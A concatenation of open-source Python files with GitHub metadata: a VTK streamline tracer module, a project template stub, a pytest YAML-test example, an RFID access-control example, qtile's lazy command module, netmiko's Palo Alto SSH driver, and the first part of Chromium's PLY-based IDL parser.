if idx == 0:
self._streamTracer.SetInput(inputStream)
else:
self._streamTracer.SetSource(inputStream)
def get_output_descriptions(self):
return ('Streamlines polydata',)
def get_output(self, idx):
return self._streamTracer.GetOutput()
def logic_to_config(self):
self._config.max_prop = \
self._streamTracer.GetMaximumPropagation()
self._config.integration_direction = \
self._streamTracer.GetIntegrationDirection()
self._config.integrator = self._streamTracer.GetIntegratorType()
# this will extract the possible choices
self.iac_logic_to_config(self._streamTracer, ARRAY_IDX)
def config_to_logic(self):
self._streamTracer.SetMaximumPropagation(self._config.max_prop)
self._streamTracer.SetIntegrationDirection(self._config.integration_direction)
self._streamTracer.SetIntegratorType(self._config.integrator)
# it seems that array_idx == 1 refers to vectors
# array_idx 0 gives me only the x-component of multi-component
# arrays
self.iac_config_to_logic(self._streamTracer, ARRAY_IDX)
def config_to_view(self):
# first get our parent mixin to do its thing
ScriptedConfigModuleMixin.config_to_view(self)
choice = self._getWidget(0)
self.iac_config_to_view(choice)
|
{
"content_hash": "16a82f0b7741dc61405155ca0b7d62dc",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 86,
"avg_line_length": 36.5,
"alnum_prop": 0.620217288615966,
"repo_name": "ivoflipse/devide",
"id": "ced8950c08a0cfdb2b70a7469dc2183de906b042",
"size": "4234",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "modules/filters/streamTracer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "NSIS",
"bytes": "2786"
},
{
"name": "Python",
"bytes": "3102319"
},
{
"name": "Shell",
"bytes": "7369"
}
],
"symlink_target": ""
}
|
__author__ = 'magic_full_name_magic'
__email__ = 'magic_email_magic'
__version__ = 'magic_version_magic'
|
{
"content_hash": "978bcb275ce8354814745b73c0521c86",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 36,
"avg_line_length": 35,
"alnum_prop": 0.6476190476190476,
"repo_name": "amjith/py-template",
"id": "aeb59022336fdfe24c66416599cbede7b556efe6",
"size": "130",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "magic_repo_name_magic/__init__.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "1752"
},
{
"name": "Python",
"bytes": "2264"
}
],
"symlink_target": ""
}
|
import pytest
def pytest_collect_file(parent, file_path):
if file_path.suffix == ".yaml" and file_path.name.startswith("test"):
return YamlFile.from_parent(parent, path=file_path)
class YamlFile(pytest.File):
def collect(self):
# We need a yaml parser, e.g. PyYAML.
import yaml
raw = yaml.safe_load(self.path.open())
for name, spec in sorted(raw.items()):
yield YamlItem.from_parent(self, name=name, spec=spec)
class YamlItem(pytest.Item):
def __init__(self, *, spec, **kwargs):
super().__init__(**kwargs)
self.spec = spec
def runtest(self):
for name, value in sorted(self.spec.items()):
# Some custom test execution (dumb example follows).
if name != value:
raise YamlException(self, name, value)
def repr_failure(self, excinfo):
"""Called when self.runtest() raises an exception."""
if isinstance(excinfo.value, YamlException):
return "\n".join(
[
"usecase execution failed",
" spec failed: {1!r}: {2!r}".format(*excinfo.value.args),
" no further details known at this point.",
]
)
def reportinfo(self):
return self.path, 0, f"usecase: {self.name}"
class YamlException(Exception):
"""Custom exception for error reporting."""
|
{
"content_hash": "3c8705a0a254ea723c615d288b10fee1",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 79,
"avg_line_length": 31.02173913043478,
"alnum_prop": 0.5711282410651717,
"repo_name": "pytest-dev/pytest",
"id": "bc39a1f6b204888e14e8ec66815f99793202ded8",
"size": "1452",
"binary": false,
"copies": "10",
"ref": "refs/heads/main",
"path": "doc/en/example/nonpython/conftest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Gherkin",
"bytes": "192"
},
{
"name": "Python",
"bytes": "2748374"
}
],
"symlink_target": ""
}
|
from rfid import RFIDClient
ip_address = "192.168.1.20"
controller_serial = 123106461
client = RFIDClient(ip_address, controller_serial)
client.open_door(1)
|
{
"content_hash": "518375c3817e3776d05b6eaae7a25945",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 50,
"avg_line_length": 22.714285714285715,
"alnum_prop": 0.7735849056603774,
"repo_name": "pawl/Chinese-RFID-Access-Control-Library",
"id": "9dca995919ed4f6b96b75603ccc93217f8af9a14",
"size": "159",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/open_door.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9322"
}
],
"symlink_target": ""
}
|
from typing import Dict, List, Optional, Tuple # noqa: F401
from libqtile.command_client import InteractiveCommandClient
from libqtile.command_interface import CommandInterface
from libqtile.command_graph import CommandGraphCall, CommandGraphNode, SelectorType
class LazyCall:
def __init__(self, call: CommandGraphCall, args: Tuple, kwargs: Dict) -> None:
"""The lazily evaluated command graph call
Parameters
----------
call : CommandGraphCall
The call that is made
args : Tuple
The args passed to the call when it is evaluated.
kwargs : Dict
The kwargs passed to the call when it is evaluated.
"""
self._call = call
self._args = args
self._kwargs = kwargs
self._layout = None # type: Optional[str]
self._when_floating = True
@property
def selectors(self) -> List[SelectorType]:
"""The selectors for the given call"""
return self._call.selectors
@property
def name(self) -> str:
"""The name of the given call"""
return self._call.name
@property
def args(self) -> Tuple:
"""The args to the given call"""
return self._args
@property
def kwargs(self) -> Dict:
"""The kwargs to the given call"""
return self._kwargs
def when(self, layout=None, when_floating=True):
self._layout = layout
self._when_floating = when_floating
def check(self, q) -> bool:
if self._layout is not None:
if self._layout == 'floating':
if q.current_window.floating:
return True
return False
if q.current_layout.name != self._layout:
if q.current_window and q.current_window.floating and not self._when_floating:
return False
return True
class LazyCommandObject(CommandInterface):
"""A lazy loading command object
Allows all commands and items to be resolved at run time, and returns
lazily evaluated commands.
"""
def execute(self, call: CommandGraphCall, args: Tuple, kwargs: Dict) -> LazyCall:
"""Lazily evaluate the given call"""
return LazyCall(call, args, kwargs)
def has_command(self, node: CommandGraphNode, command: str) -> bool:
"""Lazily resolve the given command"""
return True
def has_item(self, node: CommandGraphNode, object_type: str, item: str) -> bool:
"""Lazily resolve the given item"""
return True
lazy = InteractiveCommandClient(LazyCommandObject())
|
{
"content_hash": "2b0447934ce0f54c2816abe201c19880",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 94,
"avg_line_length": 31.238095238095237,
"alnum_prop": 0.6158536585365854,
"repo_name": "soulchainer/qtile",
"id": "7e8856690c1710feda48d2b545f12884e181049a",
"size": "3735",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libqtile/lazy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1135"
},
{
"name": "Python",
"bytes": "1152583"
},
{
"name": "Roff",
"bytes": "3605"
},
{
"name": "Shell",
"bytes": "5643"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import re
from netmiko.base_connection import BaseConnection
class PaloAltoPanosSSH(BaseConnection):
"""
Implement methods for interacting with PaloAlto devices.
Disables `enable()` and `check_enable_mode()`
methods. Overrides several methods for PaloAlto-specific compatibility.
"""
def session_preparation(self):
"""
Prepare the session after the connection has been established.
Disable paging (the '--more--' prompts).
Set the base prompt for interaction ('>').
"""
self.set_base_prompt(delay_factor=3)
self.disable_paging(command="set cli pager off\n")
def check_enable_mode(self, *args, **kwargs):
"""No enable mode on PaloAlto."""
pass
def enable(self, *args, **kwargs):
"""No enable mode on PaloAlto."""
pass
def exit_enable_mode(self, *args, **kwargs):
"""No enable mode on PaloAlto."""
pass
def check_config_mode(self, check_string=']'):
"""Checks if the device is in configuration mode or not."""
return super(PaloAltoPanosSSH, self).check_config_mode(check_string=check_string)
def config_mode(self, config_command='configure'):
"""Enter configuration mode."""
return super(PaloAltoPanosSSH, self).config_mode(config_command=config_command)
def exit_config_mode(self, exit_config='exit'):
"""Exit configuration mode."""
output = ""
if self.check_config_mode():
output = self.send_command(exit_config, strip_prompt=False, strip_command=False)
if self.check_config_mode():
raise ValueError("Failed to exit configuration mode")
return output
def commit(self, force=False, partial=False, device_and_network=False,
policy_and_objects=False, vsys='', no_vsys=False, delay_factor=.1):
"""
Commit the candidate configuration.
Commit the entered configuration. Raise an error and return the failure
if the commit fails.
Automatically enters configuration mode
default:
command_string = commit
(device_and_network or policy_and_objects or vsys or
no_vsys) and not partial:
Exception
"""
delay_factor = self.select_delay_factor(delay_factor)
if ((device_and_network or policy_and_objects or vsys or
no_vsys) and not partial):
raise ValueError("'partial' must be True when using "
"device_and_network or policy_and_objects "
"or vsys or no_vsys.")
# Select proper command string based on arguments provided
command_string = 'commit'
commit_marker = 'configuration committed successfully'
if force:
command_string += ' force'
if partial:
command_string += ' partial'
if vsys:
command_string += ' {0}'.format(vsys)
if device_and_network:
command_string += ' device-and-network'
if policy_and_objects:
command_string += ' device-and-network'
if no_vsys:
command_string += ' no-vsys'
command_string += ' excluded'
# Enter config mode (if necessary)
output = self.config_mode()
output += self.send_command_expect(command_string, strip_prompt=False,
strip_command=False, expect_string='100%',
delay_factor=delay_factor)
if commit_marker not in output.lower():
raise ValueError("Commit failed with the following errors:\n\n{0}"
.format(output))
return output
def strip_command(self, command_string, output):
"""
Strip command_string from output string
"""
output_list = output.split(command_string)
return '\n'.join(output_list)
def strip_prompt(self, a_string):
'''
Strip the trailing router prompt from the output
'''
response_list = a_string.split('\n')
new_response_list = []
for line in response_list:
if self.base_prompt not in line:
new_response_list.append(line)
output = '\n'.join(new_response_list)
return self.strip_context_items(output)
@staticmethod
def strip_context_items(a_string):
"""Strip PaloAlto-specific output.
PaloAlto will also put a configuration context:
[edit]
This method removes those lines.
"""
strings_to_strip = [
r'\[edit.*\]',
]
response_list = a_string.split('\n')
last_line = response_list[-1]
for pattern in strings_to_strip:
if re.search(pattern, last_line):
return "\n".join(response_list[:-1])
return a_string
def send_command_expect(self, *args, **kwargs):
"""Palo Alto requires an extra delay"""
return self.send_command(*args, **kwargs)
def send_command(self, *args, **kwargs):
"""Palo Alto requires an extra delay"""
kwargs['delay_factor'] = kwargs.get('delay_factor', 2.5)
return super(PaloAltoPanosSSH, self).send_command(*args, **kwargs)
|
{
"content_hash": "2623d1615b18251c4bd03113f1f93c30",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 92,
"avg_line_length": 35.12337662337662,
"alnum_prop": 0.5838417452394158,
"repo_name": "shsingh/netmiko",
"id": "3208a34399c7c57630ec349b41363372b382d912",
"size": "5409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "netmiko/paloalto/paloalto_panos_ssh.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "174778"
},
{
"name": "Shell",
"bytes": "5145"
}
],
"symlink_target": ""
}
|
""" Parser for PPAPI IDL """
#
# IDL Parser
#
# The parser is uses the PLY yacc library to build a set of parsing rules based
# on WebIDL.
#
# WebIDL, and WebIDL grammar can be found at:
# http://heycam.github.io/webidl/
# PLY can be found at:
# http://www.dabeaz.com/ply/
#
# The parser generates a tree by recursively matching sets of items against
# defined patterns. When a match is made, that set of items is reduced
# to a new item. The new item can provide a match for parent patterns.
# In this way an AST is built (reduced) depth first.
#
#
# Disable check for line length and Member as Function due to how grammar rules
# are defined with PLY
#
# pylint: disable=R0201
# pylint: disable=C0301
import os.path
import sys
import time
from idl_lexer import IDLLexer
from idl_node import IDLAttribute, IDLNode
#
# Try to load the ply module, if not, then assume it is in the third_party
# directory.
#
try:
# Disable lint check which fails to find the ply module.
# pylint: disable=F0401
from ply import lex
from ply import yacc
except ImportError:
module_path, module_name = os.path.split(__file__)
third_party = os.path.join(module_path, os.par, os.par, 'third_party')
sys.path.append(third_party)
# pylint: disable=F0401
from ply import lex
from ply import yacc
#
# ERROR_REMAP
#
# Maps the standard error formula into a more friendly error message.
#
ERROR_REMAP = {
'Unexpected ")" after "(".' : 'Empty argument list.',
'Unexpected ")" after ",".' : 'Missing argument.',
'Unexpected "}" after ",".' : 'Trailing comma in block.',
'Unexpected "}" after "{".' : 'Unexpected empty block.',
'Unexpected comment after "}".' : 'Unexpected trailing comment.',
'Unexpected "{" after keyword "enum".' : 'Enum missing name.',
'Unexpected "{" after keyword "struct".' : 'Struct missing name.',
'Unexpected "{" after keyword "interface".' : 'Interface missing name.',
}
def Boolean(val):
"""Convert to strict boolean type."""
if val:
return True
return False
def ListFromConcat(*items):
"""Generate list by concatenating inputs"""
itemsout = []
for item in items:
if item is None:
continue
if type(item) is not type([]):
itemsout.append(item)
else:
itemsout.extend(item)
return itemsout
def ExpandProduction(p):
if type(p) == list:
return '[' + ', '.join([ExpandProduction(x) for x in p]) + ']'
if type(p) == IDLNode:
return 'Node:' + str(p)
if type(p) == IDLAttribute:
return 'Attr:' + str(p)
if type(p) == str:
return 'str:' + p
return '%s:%s' % (p.__class__.__name__, str(p))
# TokenTypeName
#
# Generate a string which has the type and value of the token.
#
def TokenTypeName(t):
if t.type == 'SYMBOL':
return 'symbol %s' % t.value
if t.type in ['HEX', 'INT', 'OCT', 'FLOAT']:
return 'value %s' % t.value
if t.type == 'string' :
return 'string "%s"' % t.value
if t.type == 'COMMENT' :
return 'comment'
if t.type == t.value:
return '"%s"' % t.value
if t.type == ',':
return 'Comma'
if t.type == 'identifier':
return 'identifier "%s"' % t.value
return 'keyword "%s"' % t.value
#
# IDL Parser
#
# The Parser inherits the from the Lexer to provide PLY with the tokenizing
# definitions. Parsing patterns are encoded as functions where p_<name> is
# is called any time a patern matching the function documentation is found.
# Paterns are expressed in the form of:
# """ <new item> : <item> ....
# | <item> ...."""
#
# Where new item is the result of a match against one or more sets of items
# separated by the "|".
#
# The function is called with an object 'p' where p[0] is the output object
# and p[n] is the set of inputs for positive values of 'n'. Len(p) can be
# used to distinguish between multiple item sets in the pattern.
#
# For more details on parsing refer to the PLY documentation at
# http://www.dabeaz.com/ply/
#
# The parser is based on the WebIDL standard. See:
# http://heycam.github.io/webidl/#idl-grammar
#
# The various productions are annotated so that the WHOLE number greater than
# zero in the comment denotes the matching WebIDL grammar definition.
#
# Productions with a fractional component in the comment denote additions to
# the WebIDL spec, such as comments.
#
class IDLParser(object):
#
# We force all input files to start with two comments. The first comment is a
# Copyright notice followed by a file comment and finally by file level
# productions.
#
# [0] Insert a TOP definition for Copyright and Comments
def p_Top(self, p):
"""Top : COMMENT COMMENT Definitions"""
Copyright = self.BuildComment('Copyright', p, 1)
Filedoc = self.BuildComment('Comment', p, 2)
p[0] = ListFromConcat(Copyright, Filedoc, p[3])
# [0.1] Add support for Multiple COMMENTS
def p_Comments(self, p):
"""Comments : CommentsRest"""
if len(p) > 1:
p[0] = p[1]
# [0.2] Produce a COMMENT and aggregate sibling comments
def p_CommentsRest(self, p):
"""CommentsRest : COMMENT CommentsRest
| """
if len(p) > 1:
p[0] = ListFromConcat(self.BuildComment('Comment', p, 1), p[2])
#
#The parser is based on the WebIDL standard. See:
# http://heycam.github.io/webidl/#idl-grammar
#
# [1]
def p_Definitions(self, p):
"""Definitions : ExtendedAttributeList Definition Definitions
| """
if len(p) > 1:
p[2].AddChildren(p[1])
p[0] = ListFromConcat(p[2], p[3])
# [2]
def p_Definition(self, p):
"""Definition : CallbackOrInterface
| Partial
| Dictionary
| Exception
| Enum
| Typedef
| ImplementsStatement"""
p[0] = p[1]
# [2.1] Error recovery for definition
def p_DefinitionError(self, p):
"""Definition : error ';'"""
p[0] = self.BuildError(p, 'Definition')
# [3]
def p_CallbackOrInterface(self, p):
"""CallbackOrInterface : CALLBACK CallbackRestOrInterface
| Interface"""
if len(p) > 2:
p[0] = p[2]
else:
p[0] = p[1]
# [4]
def p_CallbackRestOrInterface(self, p):
"""CallbackRestOrInterface : CallbackRest
| Interface"""
p[0] = p[1]
# [5]
def p_Interface(self, p):
"""Interface : INTERFACE identifier Inheritance '{' InterfaceMembers '}' ';'"""
p[0] = self.BuildNamed('Interface', p, 2, ListFromConcat(p[3], p[5]))
# [6]
def p_Partial(self, p):
"""Partial : PARTIAL PartialDefinition"""
p[2].AddChildren(self.BuildTrue('Partial'))
p[0] = p[2]
# [6.1] Error recovery for Partial
def p_PartialError(self, p):
"""Partial : PARTIAL error"""
p[0] = self.BuildError(p, 'Partial')
# [7]
def p_PartialDefinition(self, p):
"""PartialDefinition : PartialDictionary
| PartialInterface"""
p[0] = p[1]
# [8]
def p_PartialInterface(self, p):
"""PartialInterface : INTERFACE identifier '{' InterfaceMembers '}' ';'"""
p[0] = self.BuildNamed('Interface', p, 2, p[4])
# [9]
def p_InterfaceMembers(self, p):
"""InterfaceMembers : ExtendedAttributeList InterfaceMember InterfaceMembers
|"""
if len(p) > 1:
p[2].AddChildren(p[1])
p[0] = ListFromConcat(p[2], p[3])
# [10]
def p_InterfaceMember(self, p):
"""InterfaceMember : Const
| AttributeOrOperationOrIterator"""
p[0] = p[1]
# [11]
def p_Dictionary(self, p):
"""Dictionary : DICTIONARY identifier Inheritance '{' DictionaryMembers '}' ';'"""
p[0] = self.BuildNamed('Dictionary', p, 2, ListFromConcat(p[3], p[5]))
# [11.1] Error recovery for regular Dictionary
def p_DictionaryError(self, p):
"""Dictionary : DICTIONARY error ';'"""
p[0] = self.BuildError(p, 'Dictionary')
# [12]
def p_DictionaryMembers(self, p):
"""DictionaryMembers : ExtendedAttributeList DictionaryMember DictionaryMembers
|"""
if len(p) > 1:
p[2].AddChildren(p[1])
p[0] = ListFromConcat(p[2], p[3])
# [13]
def p_DictionaryMember(self, p):
"""DictionaryMember : Type identifier Default ';'"""
p[0] = self.BuildNamed('Key', p, 2, ListFromConcat(p[1], p[3]))
# [14]
def p_PartialDictionary(self, p):
"""PartialDictionary : DICTIONARY identifier '{' DictionaryMembers '}' ';'"""
partial = self.BuildTrue('Partial')
p[0] = self.BuildNamed('Dictionary', p, 2, ListFromConcat(p[4], partial))
# [14.1] Error recovery for Partial Dictionary
def p_PartialDictionaryError(self, p):
"""PartialDictionary : DICTIONARY error ';'"""
p[0] = self.BuildError(p, 'PartialDictionary')
# [15]
def p_Default(self, p):
"""Default : '=' DefaultValue
|"""
if len(p) > 1:
p[0] = self.BuildProduction('Default', p, 2, p[2])
# [16]
def p_DefaultValue(self, p):
"""DefaultValue : ConstValue
| string"""
if type(p[1]) == str:
p[0] = ListFromConcat(self.BuildAttribute('TYPE', 'DOMString'),
self.BuildAttribute('NAME', p[1]))
else:
p[0] = p[1]
# [17]
def p_Exception(self, p):
"""Exception : EXCEPTION identifier Inheritance '{' ExceptionMembers '}' ';'"""
p[0] = self.BuildNamed('Exception', p, 2, ListFromConcat(p[3], p[5]))
# [18]
def p_ExceptionMembers(self, p):
"""ExceptionMembers : ExtendedAttributeList ExceptionMember ExceptionMembers
|"""
if len(p) > 1:
p[2].AddChildren(p[1])
p[0] = ListFromConcat(p[2], p[3])
# [18.1] Error recovery for ExceptionMembers
def p_ExceptionMembersError(self, p):
"""ExceptionMembers : error"""
p[0] = self.BuildError(p, 'ExceptionMembers')
# [19]
def p_Inheritance(self, p):
"""Inheritance : ':' identifier
|"""
if len(p) > 1:
p[0] = self.BuildNamed('Inherit', p, 2)
# [20]
def p_Enum(self, p):
"""Enum : ENUM identifier '{' EnumValueList '}' ';'"""
p[0] = self.BuildNamed('Enum', p, 2, p[4])
# [20.1] Error recovery for Enums
def p_EnumError(self, p):
"""Enum : ENUM error ';'"""
p[0] = self.BuildError(p, 'Enum')
# [21]
def p_EnumValueList(self, p):
"""EnumValueList : ExtendedAttributeList string EnumValueListComma"""
enum = self.BuildNamed('EnumItem', p, 2, p[1])
p[0] = ListFromConcat(enum, p[3])
# [22]
def p_EnumValueListComma(self, p):
"""EnumValueListComma : ',' EnumValueListString
|"""
if len(p) > 1:
p[0] = p[2]
# [23]
def p_EnumValueListString(self, p):
"""EnumValueListString : ExtendedAttributeList string EnumValueListComma
|"""
if len(p) > 1:
enum = self.BuildNamed('EnumItem', p, 2, p[1])
p[0] = ListFromConcat(enum, p[3])
# [24]
def p_CallbackRest(self, p):
"""CallbackRest : identifier '=' ReturnType '(' ArgumentList ')' ';'"""
arguments = self.BuildProduction('Arguments', p, 4, p[5])
p[0] = self.BuildNamed('Callback', p, 1, ListFromConcat(p[3], arguments))
# [25]
def p_Typedef(self, p):
"""Typedef : TYPEDEF ExtendedAttributeListNoComments Type identifier ';'"""
p[0] = self.BuildNamed('Typedef', p, 4, ListFromConcat(p[2], p[3]))
# [25.1] Error recovery for Typedefs
def p_TypedefError(self, p):
"""Typedef : TYPEDEF error ';'"""
p[0] = self.BuildError(p, 'Typedef')
# [26]
def p_ImplementsStatement(self, p):
"""ImplementsStatement : identifier IMPLEMENTS identifier ';'"""
name = self.BuildAttribute('REFERENCE', p[3])
p[0] = self.BuildNamed('Implements', p, 1, name)
# [27]
def p_Const(self, p):
"""Const : CONST ConstType identifier '=' ConstValue ';'"""
value = self.BuildProduction('Value', p, 5, p[5])
p[0] = self.BuildNamed('Const', p, 3, ListFromConcat(p[2], value))
# [28]
def p_ConstValue(self, p):
"""ConstValue : BooleanLiteral
| FloatLiteral
| integer
| null"""
if type(p[1]) == str:
p[0] = ListFromConcat(self.BuildAttribute('TYPE', 'integer'),
self.BuildAttribute('NAME', p[1]))
else:
p[0] = p[1]
# [28.1] Add definition for NULL
def p_null(self, p):
"""null : NULL"""
p[0] = ListFromConcat(self.BuildAttribute('TYPE', 'NULL'),
self.BuildAttribute('NAME', 'NULL'))
# [29]
def p_BooleanLiteral(self, p):
"""BooleanLiteral : TRUE
| FALSE"""
value = self.BuildAttribute('VALUE', Boolean(p[1] == 'true'))
p[0] = ListFromConcat(self.BuildAttribute('TYPE', 'boolean'), value)
# [30]
def p_FloatLiteral(self, p):
"""FloatLiteral : float
| '-' INFINITY
| INFINITY
| NAN """
if len(p) > 2:
val = '-Infinity'
else:
val = p[1]
p[0] = ListFromConcat(self.BuildAttribute('TYPE', 'float'),
self.BuildAttribute('VALUE', val))
# [31] Removed unsupported: Serializer, Stringifier
def p_AttributeOrOperationOrIterator(self, p):
"""AttributeOrOperationOrIterator : StaticMember
| Attribute
| OperationOrIterator"""
p[0] = p[1]
# [32-37] NOT IMPLEMENTED (Serializer)
# [38-39] FIXME: NOT IMPLEMENTED (Stringifier) http://crbug.com/306606
# [40]
def p_StaticMember(self, p):
"""StaticMember : STATIC StaticMemberRest"""
p[2].AddChildren(self.BuildTrue('STATIC'))
p[0] = p[2]
# [41]
def p_StaticMemberRest(self, p):
"""StaticMemberRest : AttributeRest
| ReturnType OperationRest"""
if len(p) == 2:
p[0] = p[1]
else:
p[2].AddChildren(p[1])
p[0] = p[2]
# [42]
def p_Attribute(self, p):
"""Attribute : Inherit AttributeRest"""
p[2].AddChildren(ListFromConcat(p[1]))
p[0] = p[2]
# [43]
def p_AttributeRest(self, p):
"""AttributeRest : ReadOnly ATTRIBUTE Type identifier ';'"""
p[0] = self.BuildNamed('Attribute', p, 4,
ListFromConcat(p[1], p[3]))
# [44]
def p_Inherit(self, p):
"""Inherit : INHERIT
|"""
if len(p) > 1:
p[0] = self.BuildTrue('INHERIT')
# [45]
def p_ReadOnly(self, p):
"""ReadOnly : READONLY
|"""
if len(p) > 1:
p[0] = self.BuildTrue('READONLY')
# [46]
def p_OperationOrIterator(self, p):
"""OperationOrIterator : ReturnType OperationOrIteratorRest
| SpecialOperation"""
if len(p) == 3:
p[2].AddChildren(p[1])
p[0] = p[2]
else:
p[0] = p[1]
# [47]
def p_SpecialOperation(self, p):
"""SpecialOperation : Special Specials ReturnType OperationRest"""
p[4].AddChildren(ListFromConcat(p[1], p[2], p[3]))
p[0] = p[4]
# [48]
def p_Specials(self, p):
"""Specials : Special Specials
| """
if len(p) > 1:
p[0] = ListFromConcat(p[1], p[2])
# [49]
def p_Special(self, p):
"""Special : GETTER
| SETTER
| CREATOR
| DELETER
| LEGACYCALLER"""
p[0] = self.BuildTrue(p[1].upper())
# [50] Removed unsupported: IteratorRest
def p_OperationOrIteratorRest(self, p):
"""OperationOrIteratorRest : OperationRest"""
p[0] = p[1]
# [51-53] NOT IMPLEMENTED (IteratorRest)
# [54]
def p_OperationRest(self, p):
"""OperationRest : OptionalIdentifier '(' ArgumentList ')' ';'"""
arguments = self.BuildProduction('Arguments', p, 2, p[3])
p[0] = self.BuildNamed('Operation', p, 1, arguments)
# [55]
def p_OptionalIdentifier(self, p):
"""OptionalIdentifier : identifier
|"""
if len(p) > 1:
p[0] = p[1]
else:
p[0] = '_unnamed_'
# [56]
def p_ArgumentList(self, p):
"""ArgumentList : Argument Arguments
|"""
if len(p) > 1:
p[0] = ListFromConcat(p[1], p[2])
# [56.1] ArgumentList error recovery
def p_ArgumentListError(self, p):
"""ArgumentList : error """
p[0] = self.BuildError(p, 'ArgumentList')
# [57]
def p_Arguments(self, p):
"""Arguments : ',' Argument Arguments
|"""
if len(p) > 1:
p[0] = ListFromConcat(p[2], p[3])
# [58]
def p_Argument(self, p):
"""Argument : ExtendedAttributeList OptionalOrRequiredArgument"""
p[2].AddChildren(p[1])
p[0] = p[2]
# [59]
def p_OptionalOrRequiredArgument(self, p):
"""OptionalOrRequiredArgument : OPTIONAL Type ArgumentName Default
| Type Ellipsis ArgumentName"""
if len(p) > 4:
arg = self.BuildNamed('Argument', p, 3, ListFromConcat(p[2], p[4]))
arg.AddChildren(self.BuildTrue('OPTIONAL'))
else:
arg = self.BuildNamed('Argument', p, 3, ListFromConcat(p[1], p[2]))
p[0] = arg
# [60]
def p_ArgumentName(self, p):
"""ArgumentName : ArgumentNameKeyword
| identifier"""
p[0] = p[1]
# [61]
def p_Ellipsis(self, p):
"""Ellipsis : ELLIPSIS
|"""
if len(p) > 1:
p[0] = self.BuildNamed('Argument', p, 1)
p[0].AddChildren(self.BuildTrue('ELLIPSIS'))
# [62]
def p_ExceptionMember(self, p):
"""ExceptionMember : Const
| ExceptionField"""
p[0] = p[1]
# [63]
def p_ExceptionField(self, p):
"""ExceptionField : Type identifier ';'"""
p[0] = self.BuildNamed('ExceptionField', p, 2, p[1])
# [63.1] Error recovery for ExceptionMembers
def p_ExceptionFieldError(self, p):
"""ExceptionField : error"""
p[0] = self.BuildError(p, 'ExceptionField')
# [64] No comment version for mid statement attributes.
def p_ExtendedAttributeListNoComments(self, p):
"""ExtendedAttributeListNoComments : '[' ExtendedAttribute ExtendedAttributes ']'
| """
if len(p) > 2:
items = ListFromConcat(p[2], p[3])
p[0] = self.BuildProduction('ExtAttributes', p, 1, items)
# [64.1] Add optional comment field for start of statements.
def p_ExtendedAttributeList(self, p):
"""ExtendedAttributeList : Comments '[' ExtendedAttribute ExtendedAttributes ']'
| Comments """
if len(p) > 2:
items = ListFromConcat(p[3], p[4])
attribs = self.BuildProduction('ExtAttributes', p, 2, items)
p[0] = ListFromConcat(p[1], attribs)
else:
p[0] = p[1]
# [65]
def p_ExtendedAttributes(self, p):
"""ExtendedAttributes : ',' ExtendedAttribute ExtendedAttributes
|"""
if len(p) > 1:
p[0] = ListFromConcat(p[2], p[3])
# We only support:
# [ identifier ]
# [ identifier = identifier ]
# [ identifier ( ArgumentList )]
# [ identifier = identifier ( ArgumentList )]
# [66] map directly to [91-93, 95]
# [67-69, 71] are unsupported
def p_ExtendedAttribute(self, p):
"""ExtendedAttribute : ExtendedAttributeNoArgs
| ExtendedAttributeArgList
| ExtendedAttributeIdent
| ExtendedAttributeNamedArgList"""
p[0] = p[1]
# [70]
def p_ArgumentNameKeyword(self, p):
"""ArgumentNameKeyword : ATTRIBUTE
| CALLBACK
| CONST
| CREATOR
| DELETER
| DICTIONARY
| ENUM
| EXCEPTION
| GETTER
| IMPLEMENTS
| INHERIT
| LEGACYCALLER
| PARTIAL
| SERIALIZER
| SETTER
| STATIC
| STRINGIFIER
| TYPEDEF
| UNRESTRICTED"""
p[0] = p[1]
# [72]
def p_Type(self, p):
"""Type : SingleType
| UnionType TypeSuffix"""
if len(p) == 2:
p[0] = self.BuildProduction('Type', p, 1, p[1])
else:
p[0] = self.BuildProduction('Type', p, 1, ListFromConcat(p[1], p[2]))
# [73]
def p_SingleType(self, p):
"""SingleType : NonAnyType
| ANY TypeSuffixStartingWithArray"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = ListFromConcat(self.BuildProduction('Any', p, 1), p[2])
# [74]
def p_UnionType(self, p):
"""UnionType : '(' UnionMemberType OR UnionMemberType UnionMemberTypes ')'"""
# [75]
def p_UnionMemberType(self, p):
"""UnionMemberType : NonAnyType
| UnionType TypeSuffix
| ANY '[' ']' TypeSuffix"""
# [76]
def p_UnionMemberTypes(self, p):
"""UnionMemberTypes : OR UnionMemberType UnionMemberTypes
|"""
# [77] Moved BYTESTRING, DOMSTRING, OBJECT, DATE, REGEXP to PrimitiveType
# Moving all built-in types into PrimitiveType makes it easier to
# differentiate between them and 'identifier', since p[1] would be a string in
# both cases.
def p_NonAnyType(self, p):
"""NonAnyType : PrimitiveType TypeSuffix
| identifier TypeSuffix
| SEQUENCE '<' Type '>' Null"""
if len(p) == 3:
if type(p[1]) == str:
typeref = self.BuildNamed('Typeref', p, 1)
else:
typeref = p[1]
p[0] = ListFromConcat(typeref, p[2])
if len(p) == 6:
p[0] = self.BuildProduction('Sequence', p, 1, ListFromConcat(p[3], p[5]))
# [78]
def p_ConstType(self, p):
"""ConstType : PrimitiveType Null
| identifier Null"""
if type(p[1]) == str:
p[0] = self.BuildNamed('Typeref', p, 1, p[2])
else:
p[1].AddChildren(p[2])
p[0] = p[1]
# [79] Added BYTESTRING, DOMSTRING, OBJECT, DATE, REGEXP
def p_PrimitiveType(self, p):
"""PrimitiveType : UnsignedIntegerType
| UnrestrictedFloatType
| BOOLEAN
| BYTE
| OCTET
| BYTESTRING
| DOMSTRING
| OBJECT
| DATE
| REGEXP"""
